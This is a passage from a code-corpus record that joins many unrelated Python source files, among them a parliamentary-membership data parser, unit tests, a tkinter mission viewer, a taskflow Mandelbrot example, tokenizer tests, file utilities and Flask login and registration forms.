    person.add("email", h.clean_emails(data.pop("email", None)))
    person.add("notes", data.pop("summary", None))
    person.add("topics", "role.pep")
    # Note: returning here means the person is neither emitted nor recorded
    # in *entities*, so their memberships are silently dropped as well.
    if h.check_person_cutoff(person):
        return
    # data.pop("image", None)
    # data.pop("images", None)
    # if len(data):
    #     pprint(data)
    context.emit(person, target=True, unique=True)
    entities[person_id] = person.id
def parse_organization(context, data, country, entities, lastmod):
    """Emit an Organization/PublicBody entity for one Popolo organization.

    The source org id may be remapped (or suppressed with None) via the
    dataset's "org_id" lookup table. Emitted ids are registered in
    *entities* for later membership resolution.
    """
    org_id = data.pop("id", None)
    org_id = context.lookup_value("org_id", org_id, org_id)
    if org_id is None:
        return
    classification = data.pop("classification", None)
    organization = context.make("Organization")
    if classification == "legislature":
        # Legislatures are modelled as public bodies rather than plain orgs.
        organization = context.make("PublicBody")
        organization.add("topics", "gov.national")
    elif classification == "party":
        organization.add("topics", "pol.party")
    else:
        context.log.error(
            "Unknown org type",
            entity=organization,
            field="classification",
            value=classification,
        )
    organization.id = context.make_slug(country, org_id)
    if organization.id is None:
        context.log.warning(
            "No ID for organization",
            entity=organization,
            country=country,
            org_id=org_id,
        )
        return
    organization.add("country", country)
    parse_common(context, organization, data, lastmod)
    organization.add("legalForm", data.pop("type", None))
    # data.pop("image", None)
    # data.pop("images", None)
    # data.pop("seats", None)
    # if len(data):
    #     pprint(data)
    context.emit(organization)
    entities[org_id] = organization.id
def parse_membership(context, data, entities, events):
    """Emit Membership entities linking a person to their organization(s).

    Two memberships may be produced: one for the seat in the organization
    (enriched with the legislative period from *events*) and one for the
    party the member sat on behalf of. Either is skipped when the person
    or organization was not previously emitted (missing from *entities*).
    """
    person_id = entities.get(data.pop("person_id", None))
    organization_id = entities.get(data.pop("organization_id", None))
    if person_id and organization_id:
        period_id = data.get("legislative_period_id")
        membership = context.make("Membership")
        membership.id = context.make_id(period_id, person_id, organization_id)
        membership.add("member", person_id)
        membership.add("organization", organization_id)
        membership.add("role", data.pop("role", None))
        membership.add("startDate", data.get("start_date"))
        membership.add("endDate", data.get("end_date"))
        # Fall back to the legislative period's dates/name where available.
        period = events.get(period_id, {})
        membership.add("startDate", period.get("start_date"))
        membership.add("endDate", period.get("end_date"))
        membership.add("description", period.get("name"))
        for source in data.get("sources", []):
            membership.add("sourceUrl", source.get("url"))
        # pprint(data)
        context.emit(membership)
    on_behalf_of_id = entities.get(data.pop("on_behalf_of_id", None))
    if person_id and on_behalf_of_id:
        membership = context.make("Membership")
        membership.id = context.make_id(person_id, on_behalf_of_id)
        membership.add("member", person_id)
        membership.add("organization", on_behalf_of_id)
        for source in data.get("sources", []):
            membership.add("sourceUrl", source.get("url"))
        context.emit(membership)
| StarcoderdataPython |
5033206 | <filename>tests/model/test_pdb.py
from __future__ import absolute_import, division, print_function
import ispyb.model.pdb
import mock
import pytest
def test_pdb_values_are_immutable():
    """Assigning to any PDB attribute must raise AttributeError."""
    pdb = ispyb.model.pdb.PDB()
    for attribute in ("name", "rawfile", "code"):
        with pytest.raises(AttributeError):
            setattr(pdb, attribute, "test")
def test_pdb_values_can_be_read_back():
    """Constructor values round-trip; empty rawfile/code collapse to None,
    while an empty name is preserved as the empty string."""
    populated = ispyb.model.pdb.PDB(
        name=mock.sentinel.name, rawfile=mock.sentinel.rawfile, code=mock.sentinel.code
    )
    assert populated.name == mock.sentinel.name
    assert populated.rawfile == mock.sentinel.rawfile
    assert populated.code == mock.sentinel.code
    unset = ispyb.model.pdb.PDB()
    for attribute in ("name", "rawfile", "code"):
        assert getattr(unset, attribute) is None
    blank = ispyb.model.pdb.PDB(name="", rawfile="", code="")
    assert blank.name == ""
    assert blank.rawfile is None
    assert blank.code is None
def test_pdb_object_representation():
    """repr() is compact; str() shows name, payload size and code, not data."""
    pdb = ispyb.model.pdb.PDB(name="somename", rawfile="x" * 100, code="somecode")
    assert repr(pdb) == "<PDB somename>"
    text = str(pdb)
    assert "somename" in text
    assert "100 bytes" in text
    assert "xxxxxxxxx" not in text
    assert "somecode" in text
| StarcoderdataPython |
9749046 | CONNECTIONADDRESS = "tcp://127.0.0.1:9000"
# Log file recording agent activity.
AGENT_INFO_PATH = './agent_cm.log'
# File persisting this agent's unique identifier between runs.
UUIDPATH = './uuid.txt'
249033 | from aiflearn.algorithms.inprocessing.adversarial_debiasing import AdversarialDebiasing
from aiflearn.algorithms.inprocessing.art_classifier import ARTClassifier
from aiflearn.algorithms.inprocessing.prejudice_remover import PrejudiceRemover
from aiflearn.algorithms.inprocessing.meta_fair_classifier import MetaFairClassifier | StarcoderdataPython |
5173065 | # -*- coding:utf-8 -*-
from src.Client.Conf.config import *
from src.Client.SystemTools.ConfFileRead import configFileRead
class ShowMission():
    """
    GUI pane that shows the details of a mission selected in the search bar.
    """
    def __init__(self):
        # tkinter StringVars holding the (localized) label prefixes.
        self.windowTitleVar = tkinter.StringVar()
        self.missionIdVar = tkinter.StringVar()
        self.missionNameVar = tkinter.StringVar()
        self.missionRangeVar = tkinter.StringVar()
        self.missionNextTimeVar = tkinter.StringVar()
        self.missionStateVar = tkinter.StringVar()
        self.missionLoopTimeVar = tkinter.StringVar()
        # NOTE(review): missionStateVar is assigned twice (here and above),
        # so one StringVar is discarded -- looks like a copy/paste slip.
        self.missionStateVar = tkinter.StringVar()
        self.language()
        pass
    def language(self):
        """
        Language switching; currently not called externally (i.e. a change
        only takes effect after a restart).
        :return:
        """
        # Read the configured UI language ('CN' or 'EN'); anything else
        # falls back to the Chinese labels.
        languageType = configFileRead.ConfigFileRead(fileName='./conf/user.ini').readFile("LANGUAGE", 'language')
        if languageType == 'CN':
            self.windowTitleVar.set('任务详情')
            self.missionIdVar.set('任务id: ')
            self.missionNameVar.set('任务书名: ')
            self.missionRangeVar.set('任务范围: ')
            self.missionNextTimeVar.set('下次任务时间: ')
            self.missionStateVar.set('任务状态: ')
            self.missionLoopTimeVar.set('剩余迭代次数: ')
            self.missionStateVar.set('完成状态: ')
        elif languageType == 'EN':
            self.windowTitleVar.set('mission detail')
            self.missionIdVar.set('mission id: ')
            self.missionNameVar.set('mission name: ')
            self.missionRangeVar.set('mission range: ')
            self.missionNextTimeVar.set('next time: ')
            self.missionStateVar.set('mission state: ')
            self.missionLoopTimeVar.set('remain loop time: ')
            self.missionStateVar.set('mission state: ')
        else:
            self.windowTitleVar.set('任务详情')
            self.missionIdVar.set('任务id: ')
            self.missionNameVar.set('任务书名: ')
            self.missionRangeVar.set('任务范围: ')
            self.missionNextTimeVar.set('下次任务时间: ')
            self.missionStateVar.set('任务状态: ')
            self.missionLoopTimeVar.set('剩余迭代次数: ')
            self.missionStateVar.set('完成状态: ')
    def window(self, result):
        """Open a fixed-size, screen-centered top-level window showing one
        mission's fields. *result* is a dict with keys missionId, bookName,
        missionRange, nextTime, state, loopTime and isFinish."""
        showWindow = tkinter.Toplevel()
        screenWidth = showWindow.winfo_screenwidth()
        screenHeight = showWindow.winfo_screenheight()
        # Center the 300x250 window on the screen.
        showWindow.geometry(
            '300x250+' + str(int((screenWidth - 300) / 2)) + '+' + str(int((screenHeight - 250) / 2)))
        showWindow.resizable(width=False, height=False)
        showWindow.title(self.windowTitleVar.get())
        showWindow.iconbitmap('images/icon.ico')
        # Show the mission id
        showMission = self.missionIdVar.get() + str(result['missionId'])
        missiondLabel = tkinter.Label(showWindow, text=showMission)
        missiondLabel.place(x=30, y=20, anchor='nw')
        # Show the book name
        showBookName = self.missionNameVar.get() + str(result['bookName'])
        bookNameLabel = tkinter.Label(showWindow, text=showBookName)
        bookNameLabel.place(x=30, y=50, anchor='nw')
        # Show the mission range
        showMissionRange = self.missionRangeVar.get() + str(result['missionRange'])
        missionRangeLabel = tkinter.Label(showWindow, text=showMissionRange)
        missionRangeLabel.place(x=30, y=80, anchor='nw')
        # Show the next scheduled run time
        showNextTime = self.missionNextTimeVar.get() + str(result['nextTime'])
        nextTimeLabel = tkinter.Label(showWindow, text=showNextTime)
        nextTimeLabel.place(x=30, y=110, anchor='nw')
        # Show the mission state
        showMissionState = self.missionStateVar.get() + str(result['state'])
        stateMissionLabel = tkinter.Label(showWindow, text=showMissionState)
        stateMissionLabel.place(x=30, y=140, anchor='nw')
        # Show the remaining loop count
        showLoopTime = self.missionLoopTimeVar.get() + str(result['loopTime'])
        loopTimeLabel = tkinter.Label(showWindow, text=showLoopTime)
        loopTimeLabel.place(x=30, y=170, anchor='nw')
        # Show the completion status
        showIsFinish = self.missionStateVar.get() + str(result['isFinish'])
        isFinishLabel = tkinter.Label(showWindow, text=showIsFinish)
        isFinishLabel.place(x=30, y=200, anchor='nw')
| StarcoderdataPython |
4864469 | import re
def solution(s):
    """Split a camelCase string into space-separated words.

    Each word starts at a letter and runs until (not including) the next
    uppercase letter, so 'camelCasing' becomes 'camel Casing'.
    """
    pieces = (match.group(0) for match in re.finditer('[a-zA-Z][^A-Z]*', s))
    return ' '.join(pieces)
print(solution('camelCasing')) | StarcoderdataPython |
5095397 | # -*- coding: utf-8 -*-
# Copyright (C) 2014 Yahoo! Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import math
import os
import sys
top_dir = os.path.abspath(os.path.join(os.path.dirname(__file__),
os.pardir,
os.pardir))
sys.path.insert(0, top_dir)
from six.moves import range as compat_range
from taskflow import engines
from taskflow.engines.worker_based import worker
from taskflow.patterns import unordered_flow as uf
from taskflow import task
from taskflow.utils import threading_utils
# INTRO: This example walks through a workflow that will in parallel compute
# a mandelbrot result set (using X 'remote' workers) and then combine their
# results together to form a final mandelbrot fractal image. It shows a usage
# of taskflow to perform a well-known embarrassingly parallel problem that has
# the added benefit of also being an elegant visualization.
#
# NOTE(harlowja): this example simulates the expected larger number of workers
# by using a set of threads (which in this example simulate the remote workers
# that would typically be running on other external machines).
#
# NOTE(harlowja): to have it produce an image run (after installing pillow):
#
# $ python taskflow/examples/wbe_mandelbrot.py output.png
BASE_SHARED_CONF = {
'exchange': 'taskflow',
}
WORKERS = 2
WORKER_CONF = {
# These are the tasks the worker can execute, they *must* be importable,
# typically this list is used to restrict what workers may execute to
# a smaller set of *allowed* tasks that are known to be safe (one would
# not want to allow all python code to be executed).
'tasks': [
'%s:MandelCalculator' % (__name__),
],
}
ENGINE_CONF = {
'engine': 'worker-based',
}
# Mandelbrot & image settings...
IMAGE_SIZE = (512, 512)
CHUNK_COUNT = 8
MAX_ITERATIONS = 25
class MandelCalculator(task.Task):
    """Task computing the mandelbrot iteration counts for a band of rows."""
    def execute(self, image_config, mandelbrot_config, chunk):
        """Compute the escape-iteration count for every pixel in *chunk*.

        :param image_config: dict with a 'size' (height, width) entry.
        :param mandelbrot_config: [min_x, max_x, min_y, max_y, max_iters].
        :param chunk: [first_row, last_row) half-open row range to compute.
        :returns: list of rows, each a list of per-pixel iteration counts.
        """
        # Parts borrowed from (credit to <NAME> and <NAME>).
        #
        # http://nbviewer.ipython.org/gist/harrism/f5707335f40af9463c43
        def mandelbrot(x, y, max_iters):
            # Iterations before the point (x, y) escapes |z| >= 2, capped
            # at max_iters for points assumed to be in the set.
            c = complex(x, y)
            z = 0.0j
            for i in compat_range(max_iters):
                z = z * z + c
                if (z.real * z.real + z.imag * z.imag) >= 4:
                    return i
            return max_iters
        min_x, max_x, min_y, max_y, max_iters = mandelbrot_config
        height, width = image_config['size']
        pixel_size_x = (max_x - min_x) / width
        pixel_size_y = (max_y - min_y) / height
        block = []
        for y in compat_range(chunk[0], chunk[1]):
            row = []
            imag = min_y + y * pixel_size_y
            for x in compat_range(0, width):
                real = min_x + x * pixel_size_x
                row.append(mandelbrot(real, imag, max_iters))
            block.append(row)
        return block
def calculate(engine_conf):
    """Run the distributed mandelbrot computation and gather the points.

    :param engine_conf: worker-based engine configuration (must include the
        worker topics to dispatch to).
    :returns: list of ((x, y), iteration_count) tuples in row-major order.
    """
    # Subdivide the work into X pieces, then request each worker to calculate
    # one of those chunks and then later we will write these chunks out to
    # an image bitmap file.
    # And unordered flow is used here since the mandelbrot calculation is an
    # example of an embarrassingly parallel computation that we can scatter
    # across as many workers as possible.
    flow = uf.Flow("mandelbrot")
    # These symbols will be automatically given to tasks as input to their
    # execute method, in this case these are constants used in the mandelbrot
    # calculation.
    store = {
        'mandelbrot_config': [-2.0, 1.0, -1.0, 1.0, MAX_ITERATIONS],
        'image_config': {
            'size': IMAGE_SIZE,
        }
    }
    # We need the task names to be in the right order so that we can extract
    # the final results in the right order (we don't care about the order when
    # executing).
    task_names = []
    # Compose our workflow.
    height, _width = IMAGE_SIZE
    chunk_size = int(math.ceil(height / float(CHUNK_COUNT)))
    for i in compat_range(0, CHUNK_COUNT):
        chunk_name = 'chunk_%s' % i
        task_name = "calculation_%s" % i
        # Break the calculation up into chunk size pieces.
        rows = [i * chunk_size, i * chunk_size + chunk_size]
        flow.add(
            MandelCalculator(task_name,
                             # This ensures the storage symbol with name
                             # 'chunk_name' is sent into the tasks local
                             # symbol 'chunk'. This is how we give each
                             # calculator its own correct sequence of rows
                             # to work on.
                             rebind={'chunk': chunk_name}))
        store[chunk_name] = rows
        task_names.append(task_name)
    # Now execute it.
    eng = engines.load(flow, store=store, engine_conf=engine_conf)
    eng.run()
    # Gather all the results and order them for further processing.
    gather = []
    for name in task_names:
        gather.extend(eng.storage.get(name))
    # Flatten the rows into ((x, y), color) points for the image writer.
    points = []
    for y, row in enumerate(gather):
        for x, color in enumerate(row):
            points.append(((x, y), color))
    return points
def write_image(results, output_filename=None):
    """Summarize the gathered mandelbrot points and optionally render them.

    :param results: list of ``((x, y), iteration_count)`` tuples covering
        every pixel of the ``IMAGE_SIZE`` image.
    :param output_filename: path for the grayscale bitmap; when falsy, only
        the summary line is printed and nothing is written.
    :raises RuntimeError: if an output file is requested but Pillow is not
        installed.
    """
    print("Gathered %s results that represents a mandelbrot"
          " image (using %s chunks that are computed jointly"
          " by %s workers)." % (len(results), CHUNK_COUNT, WORKERS))
    if not output_filename:
        return
    # Pillow (the PIL fork) saves us from writing our own image writer...
    try:
        from PIL import Image
    except ImportError as e:
        # To currently get this (may change in the future),
        # $ pip install Pillow
        raise RuntimeError("Pillow is required to write image files: %s" % e)
    # Normalize iteration counts to 0..255; max(..., default=0) replaces the
    # manual scan and keeps an empty result list well defined.
    color_max = max((color for _point, color in results), default=0)
    # Use gray scale since we don't really have other colors.
    img = Image.new('L', IMAGE_SIZE, "black")
    if color_max:
        # The color_max == 0 test used to run once per pixel; when it is
        # zero every pixel would be 0, which is already the fill color.
        pixels = img.load()
        for (x, y), color in results:
            pixels[x, y] = int((float(color) / color_max) * 255.0)
    img.save(output_filename)
def create_fractal():
    """Spin up local worker threads, run the computation and write the image.

    The optional first command line argument is the output image path; when
    absent only the textual summary is printed.
    """
    logging.basicConfig(level=logging.ERROR)
    # Setup our transport configuration and merge it into the worker and
    # engine configuration so that both of those use it correctly.
    shared_conf = dict(BASE_SHARED_CONF)
    shared_conf.update({
        'transport': 'memory',
        'transport_options': {
            'polling_interval': 0.1,
        },
    })
    if len(sys.argv) >= 2:
        output_filename = sys.argv[1]
    else:
        output_filename = None
    worker_conf = dict(WORKER_CONF)
    worker_conf.update(shared_conf)
    engine_conf = dict(ENGINE_CONF)
    engine_conf.update(shared_conf)
    workers = []
    worker_topics = []
    print('Calculating your mandelbrot fractal of size %sx%s.' % IMAGE_SIZE)
    try:
        # Create a set of workers to simulate actual remote workers.
        print('Running %s workers.' % (WORKERS))
        for i in compat_range(0, WORKERS):
            # Each worker listens on its own topic; the engine fans work out
            # across all of the topics collected here.
            worker_conf['topic'] = 'calculator_%s' % (i + 1)
            worker_topics.append(worker_conf['topic'])
            w = worker.Worker(**worker_conf)
            runner = threading_utils.daemon_thread(w.run)
            runner.start()
            # Block until the worker is ready before starting the next one.
            w.wait()
            workers.append((runner, w.stop))
        # Now use those workers to do something.
        engine_conf['topics'] = worker_topics
        results = calculate(engine_conf)
        print('Execution finished.')
    finally:
        # And cleanup.
        print('Stopping workers.')
        while workers:
            r, stopper = workers.pop()
            stopper()
            r.join()
    print("Writing image...")
    write_image(results, output_filename=output_filename)
if __name__ == "__main__":
create_fractal()
| StarcoderdataPython |
4984801 | ################################################################################
# Copyright 2018 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
################################################################################
import lib.fhepy as fhe
import random
import operator
def CheckResult(m, op, result):
    """Return True when applying *op* to the first two plaintext bits of *m*
    reproduces the decrypted *result*."""
    expected = op(m[0], m[1])
    return expected == result
# Demo: encrypt two random bits, evaluate logic gates homomorphically and
# check each decrypted result against the plaintext computation.
pubkey, prikey = fhe.KeyGen()
m = [random.randint(0,1), random.randint(0,1)]
c0, c1 = fhe.Encrypt(m[0], prikey), fhe.Encrypt(m[1], prikey)
# AND Gate
c = c0 & c1
result = c.Decrypt(prikey)
print("AND gate : " + str(CheckResult(m, operator.__and__, result)))
# XOR Gate
c = c0 ^ c1
result = c.Decrypt(prikey)
print("XOR gate : " + str(CheckResult(m, operator.__xor__, result)))
# OR Gate
c = c0 | c1
result = c.Decrypt(prikey)
print("OR gate : " + str(CheckResult(m, operator.__or__, result)))
# NOT Complement
c = ~c0
result = c.Decrypt(prikey)
print("NOT gate : " + str(result != m[0]))
# NAND Gate
# CheckResult compares against plain AND, so a correct NAND result makes it
# return False; the leading `not` turns that into True on success.
c = ~(c0 & c1)
result = c.Decrypt(prikey)
print("NAND gate : " + str(not CheckResult(m, operator.__and__, result)))
| StarcoderdataPython |
5026486 | <reponame>SunYanCN/PaddleNLP
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import os
import unittest
from paddlenlp.utils.log import logger
from paddlenlp.transformers import AutoTokenizer
from paddlenlp.datasets import load_dataset
from faster_tokenizer import ErnieFasterTokenizer, models
logger.logger.setLevel('ERROR')
class TestWordpiece(unittest.TestCase):
    """Check ErnieFasterTokenizer against the reference AutoTokenizer.

    Subclasses override set_flag() to exercise the faster-wordpiece variants
    with the same assertions.
    """
    def set_flag(self):
        # Baseline configuration: plain wordpiece, no fast paths.
        self.use_faster_wordpiece = False
        self.use_faster_wordpiece_with_pretokenization = False
    def setUp(self):
        self.max_seq_length = 128
        self.wordpiece_tokenizer = AutoTokenizer.from_pretrained("ernie-1.0")
        ernie_vocab = self.wordpiece_tokenizer.vocab.token_to_idx
        # set_flag() must run before the tokenizer is built below, since the
        # flags it sets are passed to the constructor.
        self.set_flag()
        self.faster_wordpiece_tokenizer = ErnieFasterTokenizer(
            ernie_vocab,
            max_sequence_len=self.max_seq_length,
            use_faster_wordpiece=self.use_faster_wordpiece,
            use_faster_wordpiece_with_pretokenization=self.
            use_faster_wordpiece_with_pretokenization)
        # Sentences from the CLUE tnews training split serve as test inputs.
        self.dataset = [
            example["sentence"]
            for example in load_dataset(
                'clue', 'tnews', splits=['train'])
        ]
    def test_encode(self):
        """Token ids and type ids must match the reference tokenizer."""
        for sentence in self.dataset:
            wordpiece_result = self.wordpiece_tokenizer(
                sentence, max_length=self.max_seq_length)
            expected_input_ids = wordpiece_result['input_ids']
            expected_token_type_ids = wordpiece_result['token_type_ids']
            faster_wordpiece_result = self.faster_wordpiece_tokenizer.encode(
                sentence)
            actual_input_ids = faster_wordpiece_result.ids
            actual_token_type_ids = faster_wordpiece_result.type_ids
            self.assertEqual(expected_input_ids, actual_input_ids)
            self.assertEqual(expected_token_type_ids, actual_token_type_ids)
    def test_get_offset_mapping(self):
        """Character offset mappings must match the reference tokenizer."""
        for i, sentence in enumerate(self.dataset):
            wordpiece_result = self.wordpiece_tokenizer(
                sentence,
                max_length=self.max_seq_length,
                return_offsets_mapping=True)
            expected_offset_mapping = wordpiece_result['offset_mapping']
            faster_wordpiece_result = self.faster_wordpiece_tokenizer.encode(
                sentence)
            actual_offset_mapping = faster_wordpiece_result.offsets
            self.assertEqual(expected_offset_mapping, actual_offset_mapping)
class TestFasterWordpiece(TestWordpiece):
    """Re-run the TestWordpiece assertions with the fast wordpiece path on."""
    def set_flag(self):
        self.use_faster_wordpiece = True
        self.use_faster_wordpiece_with_pretokenization = False
class TestFasterWordpieceWithPretokenization(TestWordpiece):
    """Re-run the assertions with fast wordpiece plus pretokenization on."""
    def set_flag(self):
        self.use_faster_wordpiece = True
        self.use_faster_wordpiece_with_pretokenization = True
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
5167647 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Utility functions to work with ROOT and rootpy.
* ROOT: https://root.cern.ch
* rootpy: http://www.rootpy.org/
"""
from .convert import *
| StarcoderdataPython |
1856535 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2021/2/3 2:30 下午
# @File : setup.py.py
# @Author: johnson
# @Contact : github: johnson7788
# @Desc :
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="google_trans_new",
version="1.1.9",
author="LuShan",
author_email="xx",
description="xx",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/xxx",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=3.7',
) | StarcoderdataPython |
5102101 | # -*- coding: utf-8 -*-
# @Auther: Verf
# @Emal: <EMAIL>
import nvimclient
if __name__ == '__main__':
    # Delegate straight to the nvimclient command line interface.
    nvimclient.cli()
| StarcoderdataPython |
3261823 | import os
def get_file_dirs_with_suffix(directory_of_interest, suffix):
    """
    Gets all of the directories that have a file named with the given suffix
    :param directory_of_interest: string path of the directory to search
    :param suffix: string end of file name for which to look
    :return: set of directory paths that contain a file with the suffix of interest
    """
    directory_list = set()
    # os.walk yields (dirpath, dirnames, filenames) tuples; unpack directly
    # instead of indexing into the tuple.
    for parent_directory, _subdirectories, file_names in os.walk(directory_of_interest):
        # any() stops at the first matching file, so a directory is added at
        # most once and the remaining files need not be scanned.
        if any(file_name.endswith(suffix) for file_name in file_names):
            directory_list.add(parent_directory)
    return directory_list
def main(args):
    """Print each directory under ``args.directory`` that contains a file
    ending with ``args.suffix``, one path per line."""
    matching_directories = get_file_dirs_with_suffix(args.directory, args.suffix)
    for directory in matching_directories:
        print(directory)
if __name__ == '__main__':
    import argparse
    # Two required positional arguments: the suffix first, then the
    # directory tree to search.
    parser = argparse.ArgumentParser(description='Searches a directory for files ending'
                                                 ' in a given suffix.')
    parser.add_argument('suffix', type=str, help='file suffix for which to search')
    parser.add_argument('directory', type=str, help='directory in which to search')
    args = parser.parse_args()
    main(args)
| StarcoderdataPython |
8075749 | import os
from random import sample
import matplotlib.pyplot as plt
import requests
from imageio import imread
# Global model settings
INPUT_DATA_DIR = 'Data/Images/'
INPUT_SHAPE = (224, 224, 3)
# All available training images
files = [file for file in os.listdir(INPUT_DATA_DIR) if file.endswith(".jpg")]
file_paths = [INPUT_DATA_DIR + file for file in files]
sample_path = sample(files, 1)[0]
img = imread(INPUT_DATA_DIR + sample_path)
# Send data as list to TF serving via json dump
request_url = 'http://localhost:5000/grad-cam'
request_body = {"label": sample_path, "image": img.tolist()}
request_headers = {"content-type": "application/json"}
response = requests.post(request_url, json=request_body, headers=request_headers)
heatmap = response.json()['heatmap']
plt.imshow(heatmap)
plt.show()
| StarcoderdataPython |
8183024 | import os
import shutil
def _copy_missing(names, file_types, existing, src_dir, dst_dir):
    """Copy each file in *names* whose name matches one of *file_types*
    (substring match, preserving the original selection rule) and is not
    already present in *existing*, from *src_dir* into *dst_dir*,
    preserving file metadata."""
    for name in names:
        if any(ftype in name for ftype in file_types) and name not in existing:
            shutil.copy2(os.path.join(src_dir, name), os.path.join(dst_dir, name))


def cp_same_dif_files(source1, source2, destination_same, destination_dif, file_types):
    """Compare the files in *source1* and *source2* and sort them by overlap.

    Files present in both sources are copied into *destination_same*
    (from *source1*); files unique to one source are copied into
    ``destination_dif/source1`` or ``destination_dif/source2`` respectively.
    Only files whose names match one of *file_types* are copied, and files
    already present at a destination are skipped.

    Fixes vs. the original:
    - membership is compared with sets (``os.listdir`` returns entries in
      arbitrary order, so list equality was unreliable);
    - paths are joined with ``os.path.join`` (no trailing-slash requirement);
    - the "already copied" check now looks inside ``destination_dif/source1``
      and ``destination_dif/source2`` instead of listing the parent directory
      (which only contains the sub-directory names).
    """
    names1 = os.listdir(source1)
    names2 = os.listdir(source2)
    set1, set2 = set(names1), set(names2)

    dif1_dir = os.path.join(destination_dif, 'source1')
    dif2_dir = os.path.join(destination_dif, 'source2')
    for subdir in (dif1_dir, dif2_dir):
        if not os.path.isdir(subdir):
            os.makedirs(subdir)

    if set1 == set2:
        print("directories contain the same files; no files copied; focus on one of source directories")
        return
    print("directories do not contain the same files")

    # Files unique to each source go to the corresponding "dif" sub-directory.
    _copy_missing([n for n in names1 if n not in set2], file_types,
                  set(os.listdir(dif1_dir)), source1, dif1_dir)
    _copy_missing([n for n in names2 if n not in set1], file_types,
                  set(os.listdir(dif2_dir)), source2, dif2_dir)
    # Files present in both sources go to destination_same (copied from source1).
    _copy_missing([n for n in names1 if n in set2], file_types,
                  set(os.listdir(destination_same)), source1, destination_same)
# Each entry pairs the two directories to compare with the two destinations:
# (compare_dir_1, compare_dir_2, same_files_destination, different_files_destination).
path_groups = [
    ('/Users/dtaniguchi/Desktop/Test_images/Ciliate1/',
     '/Users/dtaniguchi/Desktop/Test_images/Ciliate2/',
     '/Users/dtaniguchi/Desktop/Test_images/Ciliate_Final/',
     '/Users/dtaniguchi/Desktop/Test_images/ciliate_dif'),
    ('/Users/dtaniguchi/Desktop/Test_images/Lpoly1/',
     '/Users/dtaniguchi/Desktop/Test_images/Lpoly2/',
     '/Users/dtaniguchi/Desktop/Test_images/Lpoly_Final/',
     '/Users/dtaniguchi/Desktop/Test_images/Lpoly_dif'),
]

# Only files of these types are moved around.
file_types = ['jpg']

# Run the comparison for every group of paths.
for src_a, src_b, dest_same, dest_dif in path_groups:
    cp_same_dif_files(src_a, src_b, dest_same, dest_dif, file_types)
| StarcoderdataPython |
8094101 | <filename>flask_app/flask_server/forms.py<gh_stars>1-10
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileAllowed
from flask_login import current_user
from wtforms import StringField, PasswordField, SubmitField, BooleanField, TextAreaField, SelectField, IntegerField
from wtforms.validators import DataRequired, Length, Email, EqualTo, ValidationError
from flask_server.models import User
class RegistrationForm(FlaskForm):
    """Sign-up form; rejects usernames/emails that are already registered."""

    username = StringField('Username',
                           validators=[DataRequired(), Length(min=2, max=20)])
    email = StringField('Email',
                        validators=[DataRequired(), Email()])
    password = PasswordField('Password', validators=[DataRequired()])
    # NOTE(review): the '<PASSWORD>' label looks like a redaction artifact --
    # presumably meant to read 'Confirm Password'; confirm against the template.
    confirm_password = PasswordField('<PASSWORD> Password',
                                     validators=[DataRequired(), EqualTo('password')])
    submit = SubmitField('Sign Up')

    def validate_username(self, username):
        # WTForms calls validate_<fieldname> hooks automatically during validate().
        user = User.query.filter_by(username=username.data).first()
        if user:
            raise ValidationError('That username is taken. Please choose a different one')

    def validate_email(self, email):
        user = User.query.filter_by(email=email.data).first()
        if user:
            raise ValidationError('That email is taken. Please choose a different one')
class LoginForm(FlaskForm):
    """Login form: email + password, with an optional "remember me" cookie."""

    email = StringField('Email',
                        validators=[DataRequired(), Email()])
    password = PasswordField('Password', validators=[DataRequired()])
    remember = BooleanField('Remember Me')
    submit = SubmitField('Login')
class UpdateAccountForm(FlaskForm):
    """Profile-edit form; uniqueness checks skip the current user's own values."""

    username = StringField('Username',
                           validators=[DataRequired(), Length(min=2, max=20)])
    email = StringField('Email',
                        validators=[DataRequired(), Email()])
    picture = FileField('Update Profile Picture', validators=[FileAllowed(['jpg', 'png'])])
    submit = SubmitField('update')

    def validate_username(self, username):
        # Only reject the username if it was actually changed and is taken.
        if username.data != current_user.username:
            user = User.query.filter_by(username=username.data).first()
            if user:
                raise ValidationError('That username is taken. Please choose a different one')

    def validate_email(self, email):
        # Only reject the email if it was actually changed and is taken.
        if email.data != current_user.email:
